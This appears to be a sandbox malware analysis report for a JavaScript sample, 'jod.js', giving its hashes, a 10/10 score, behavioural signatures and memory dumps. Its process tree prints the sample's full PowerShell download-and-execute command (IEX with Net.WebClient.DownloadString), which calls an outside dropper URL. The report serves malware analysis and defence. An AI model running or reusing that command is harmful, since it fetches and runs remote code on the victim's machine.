Analysis
-
max time kernel
28s -
max time network
32s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
18-05-2023 14:11
Static task
static1
Behavioral task
behavioral1
Sample
jod.js
Resource
win7-20230220-en
windows7-x64
5 signatures
150 seconds
General
-
Target
jod.js
-
Size
170KB
-
MD5
ea6103815cb06653775743a337f9d934
-
SHA1
9ec5e3f4bb4b39fcb61e0a5f15b0c6244a15ad60
-
SHA256
b9ca6866ff2792c9472c7dfd63e58dac2b3d51157a3d5bea252c873a4ea29df5
-
SHA512
7fd07e097673d14783117dd4180538ae0057530cecfb4eac14126f437272eb07e9bea10aed7ba610a9039a3ca9d08156d82e12bb89454abad1e29870e4797e73
-
SSDEEP
3072:zbT1AJM/EaZ8ok36/EI4+ZQSU2bokXPXliq3kJIAsKL3bT1AJM/EaZ8ok36/EI4c:zbZ0M/EaZ8ok36RftbokXsbZ0M/EaZ8M
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://propagandaetrafego.com/b.jpg
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 4 1312 powershell.exe 5 1312 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1312 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1312 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
wscript.exedescription pid process target process PID 1696 wrote to memory of 1312 1696 wscript.exe powershell.exe PID 1696 wrote to memory of 1312 1696 wscript.exe powershell.exe PID 1696 wrote to memory of 1312 1696 wscript.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\jod.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" IEX (New-Object Net.WebClient).DownloadString.Invoke('https://propagandaetrafego.com/b.jpg')2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1312-59-0x000000001B2F0000-0x000000001B5D2000-memory.dmpFilesize
2.9MB
-
memory/1312-58-0x00000000028A0000-0x0000000002920000-memory.dmpFilesize
512KB
-
memory/1312-61-0x0000000002290000-0x0000000002298000-memory.dmpFilesize
32KB
-
memory/1312-60-0x00000000028A0000-0x0000000002920000-memory.dmpFilesize
512KB
-
memory/1312-62-0x00000000028A0000-0x0000000002920000-memory.dmpFilesize
512KB
-
memory/1312-63-0x00000000028A0000-0x0000000002920000-memory.dmpFilesize
512KB